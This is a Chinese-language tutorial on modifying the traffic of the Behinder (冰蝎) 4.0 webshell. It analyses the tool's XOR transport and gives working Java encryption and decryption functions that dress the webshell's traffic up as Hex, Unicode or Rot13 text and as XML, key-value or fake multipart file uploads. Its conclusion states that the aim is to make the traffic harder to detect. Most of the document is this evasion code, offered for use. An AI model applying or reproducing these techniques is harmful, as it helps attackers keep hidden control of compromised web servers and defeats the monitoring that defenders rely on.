冰蝎4.0流量分析及魔改
字数 728 2025-08-25 22:58:56
冰蝎4.0流量分析及魔改技术详解
0x00 前言
冰蝎v4.0开放了传输协议的自定义功能,使得流量魔改更为简单方便。本文以jsp脚本类型为例,详细讲解冰蝎4流量魔改的各种技术方法。
0x01 传输协议分析
冰蝎4内置了多种传输协议,传输协议可以理解为流量的加密方式。以default_xor传输协议为例,这种传输协议是对原始数据进行了异或加密。
原始流量分析
如果去掉加密解密函数的相关代码,可以看到:
- request body实际传输的是java字节码
- 响应体是明文的固定格式的json类型
0x02 冰蝎4.0魔改技术
变换加密方式
1. Hex加密
加密函数:
private byte[] Encrypt(byte[] data) throws Exception {
String result = java.util.Base64.getEncoder().encodeToString(data).replace("+", "<").replace("/", ">");
String str = "";
for(int i = 0; i < result.length(); i++){
int ch = (int)result.charAt(i);
String s4 = Integer.toHexString(ch);
str = str + s4;
}
return str.getBytes();
}
解密函数:
private byte[] Decrypt(byte[] data) throws Exception {
String s = new String(data);
byte[] baKeyword = new byte[s.length()/2];
for(int i = 0; i < baKeyword.length; i++){
try {
baKeyword[i] = (byte)(0xff & Integer.parseInt(s.substring(i*2, i*2+2),16));
} catch(Exception e){
e.printStackTrace();
}
}
try {
s = new String(baKeyword, "utf-8");
} catch(Exception e1){
e1.printStackTrace();
}
byte[] str = java.util.Base64.getDecoder().decode(s.replace("<", "+").replace(">", "/"));
return str;
}
2. Unicode加密
加密函数:
private byte[] Encrypt(byte[] data) throws Exception {
String result = java.util.Base64.getEncoder().encodeToString(data).replace("+", "<").replace("/", ">");
String str = "";
StringBuffer unicode = new StringBuffer();
for(int i = 0; i < result.length(); i++){
char c = result.charAt(i);
unicode.append("\\u00" + Integer.toHexString(c));
}
return unicode.toString().getBytes();
}
解密函数:
private byte[] Decrypt(byte[] data) throws Exception {
String unicode = new String(data);
StringBuilder sb = new StringBuilder();
int i = -1;
int pos = 0;
while((i=unicode.indexOf("\\u", pos)) != -1) {
sb.append(unicode.substring(pos, i));
if(i+5 < unicode.length()) {
pos = i+6;
sb.append((char)Integer.parseInt(unicode.substring(i+2, i+6), 16));
}
}
byte[] str = java.util.Base64.getDecoder().decode(sb.toString().replace("<", "+").replace(">", "/"));
return str;
}
3. Rot13加密
加密函数:
private byte[] Encrypt(byte[] data) throws Exception {
String input = java.util.Base64.getEncoder().encodeToString(data).replace("+", "<").replace("/", ">");
String str = "";
for(int i = 0; i < input.length(); i++) {
char ch = input.charAt(i);
if(ch >= 'A' && ch <= 'Z') {
ch = (char)(ch + 13);
if(ch > 'Z') {
ch = (char)(ch - 26);
}
} else if(ch >= 'a' && ch <= 'z') {
ch = (char)(ch + 13);
if(ch > 'z') {
ch = (char)(ch - 26);
}
}
str = str + ch;
}
return str.getBytes();
}
解密函数:
private byte[] Decrypt(byte[] data) throws Exception {
String input = new String(data);
String str = "";
for(int i = 0; i < input.length(); i++) {
char ch = input.charAt(i);
if(ch >= 'A' && ch <= 'Z') {
ch = (char)(ch + 13);
if(ch > 'Z') {
ch = (char)(ch - 26);
}
} else if(ch >= 'a' && ch <= 'z') {
ch = (char)(ch + 13);
if(ch > 'z') {
ch = (char)(ch - 26);
}
}
str = str + ch;
}
return java.util.Base64.getDecoder().decode(str.replace("<", "+").replace(">", "/"));
}
变换传输方式
1. XML格式传输
加密函数:
private byte[] Encrypt(byte[] data) throws Exception {
String xml = "<?xml version=\"1.0\"?><user><id>1</id><content>DaYer0</content></user>";
xml = xml.replace("DaYer0", java.util.Base64.getEncoder().encodeToString(data).replace("+", "<").replace("/", ">"));
return xml.getBytes();
}
解密函数:
private byte[] Decrypt(byte[] data) throws Exception {
java.io.ByteArrayOutputStream bos = new java.io.ByteArrayOutputStream();
bos.write(data, 46, data.length - 63);
return java.util.Base64.getDecoder().decode(new String(bos.toByteArray()).replace("<", "+").replace(">", "/"));
}
2. Key-Value格式传输
加密函数:
private byte[] Encrypt(byte[] data) throws Exception {
String json = "id=1&content=DaYer0&token=1452178369&status=00000";
json = json.replace("DaYer0", java.util.Base64.getEncoder().encodeToString(data).replace("+", "<").replace("/", ">"));
return json.getBytes();
}
解密函数:
private byte[] Decrypt(byte[] data) throws Exception {
java.io.ByteArrayOutputStream bos = new java.io.ByteArrayOutputStream();
bos.write(data, 13, data.length - 43);
return java.util.Base64.getDecoder().decode(new String(bos.toByteArray()).replace("<", "+").replace(">", "/"));
}
3. Multipart格式传输
加密函数:
private byte[] Encrypt(byte[] data) throws Exception {
String upload = "-7e6103b1815de\nContent-Disposition:form-data;name=\"uploadFile\";filename=\"test.png\"\nContent-Type:application/octet-stream\n\nDaYer0\n--7e6103b1815de--";
upload = upload.replace("DaYer0", java.util.Base64.getEncoder().encodeToString(data).replace("+", "<").replace("/", ">"));
return upload.getBytes();
}
解密函数:
private byte[] Decrypt(byte[] data) throws Exception {
java.io.ByteArrayOutputStream bos = new java.io.ByteArrayOutputStream();
bos.write(data, 150, data.length - 195);
return java.util.Base64.getDecoder().decode(new String(bos.toByteArray()).replace("<", "+").replace(">", "/"));
}
加密方式+传输方式组合
1. XML格式+Rot13加密
加密函数:
private byte[] Encrypt(byte[] data) throws Exception {
String xml = "<?xml version=\"1.0\"?><user><id>1</id><content>DaYer0</content></user>";
String input = java.util.Base64.getEncoder().encodeToString(data).replace("+", "<").replace("/", ">");
String str = "";
for(int i = 0; i < input.length(); i++) {
char ch = input.charAt(i);
if(ch >= 'A' && ch <= 'Z') {
ch = (char)(ch + 13);
if(ch > 'Z') {
ch = (char)(ch - 26);
}
} else if(ch >= 'a' && ch <= 'z') {
ch = (char)(ch + 13);
if(ch > 'z') {
ch = (char)(ch - 26);
}
}
str = str + ch;
}
xml = xml.replace("DaYer0", str);
return xml.getBytes();
}
解密函数:
private byte[] Decrypt(byte[] data) throws Exception {
java.io.ByteArrayOutputStream bos = new java.io.ByteArrayOutputStream();
bos.write(data, 46, data.length - 63);
String input = new String(bos.toByteArray());
String str = "";
for(int i = 0; i < input.length(); i++) {
char ch = input.charAt(i);
if(ch >= 'A' && ch <= 'Z') {
ch = (char)(ch + 13);
if(ch > 'Z') {
ch = (char)(ch - 26);
}
} else if(ch >= 'a' && ch <= 'z') {
ch = (char)(ch + 13);
if(ch > 'z') {
ch = (char)(ch - 26);
}
}
str = str + ch;
}
return java.util.Base64.getDecoder().decode(str.replace("<", "+").replace(">", "/"));
}
2. Key-Value格式+Unicode加密
加密函数:
private byte[] Encrypt(byte[] data) throws Exception {
String content = "id=1&content=DaYer0&token=1452178369&status=00000";
String result = java.util.Base64.getEncoder().encodeToString(data).replace("+", "<").replace("/", ">");
String str = "";
StringBuffer unicode = new StringBuffer();
for(int i = 0; i < result.length(); i++){
char c = result.charAt(i);
unicode.append("\\u00" + Integer.toHexString(c));
}
content = content.replace("DaYer0", unicode.toString());
return content.getBytes();
}
解密函数:
private byte[] Decrypt(byte[] data) throws Exception {
java.io.ByteArrayOutputStream bos = new java.io.ByteArrayOutputStream();
bos.write(data, 13, data.length - 43);
String unicode = new String(bos.toByteArray());
StringBuilder sb = new StringBuilder();
int i = -1;
int pos = 0;
while((i=unicode.indexOf("\\u", pos)) != -1) {
sb.append(unicode.substring(pos, i));
if(i+5 < unicode.length()) {
pos = i+6;
sb.append((char)Integer.parseInt(unicode.substring(i+2, i+6), 16));
}
}
byte[] str = java.util.Base64.getDecoder().decode(sb.toString().replace("<", "+").replace(">", "/"));
return str;
}
3. Multipart格式+Hex加密
加密函数:
private byte[] Encrypt(byte[] data) throws Exception {
String upload = "-7e6103b1815de\nContent-Disposition:form-data;name=\"uploadFile\";filename=\"test.png\"\nContent-Type:application/octet-stream\n\nDaYer0\n--7e6103b1815de--";
String str = "";
String result = java.util.Base64.getEncoder().encodeToString(data).replace("+", "<").replace("/", ">");
for(int i = 0; i < result.length(); i++){
int ch = (int)result.charAt(i);
String s4 = Integer.toHexString(ch);
str = str + s4;
}
upload = upload.replace("DaYer0", str);
return upload.getBytes();
}
解密函数:
private byte[] Decrypt(byte[] data) throws Exception {
java.io.ByteArrayOutputStream bos = new java.io.ByteArrayOutputStream();
bos.write(data, 150, data.length - 195);
String s = new String(bos.toByteArray());
byte[] baKeyword = new byte[s.length()/2];
for(int i = 0; i < baKeyword.length; i++){
try {
baKeyword[i] = (byte)(0xff & Integer.parseInt(s.substring(i*2, i*2+2),16));
} catch(Exception e){
e.printStackTrace();
}
}
try {
s = new String(baKeyword, "utf-8");
} catch(Exception e1){
e1.printStackTrace();
}
return java.util.Base64.getDecoder().decode(s.replace("<", "+").replace(">", "/"));
}
0x03 总结
本文详细介绍了冰蝎4流量魔改的多种方法,包括:
- 单独变换加密方式(Hex、Unicode、Rot13)
- 单独变换传输格式(XML、Key-Value、Multipart)
- 加密方式与传输格式的组合使用
通过这些方法可以有效混淆冰蝎的通信流量,使其更难以被检测。读者可以根据实际需求选择合适的魔改方式,或进一步开发新的魔改思路。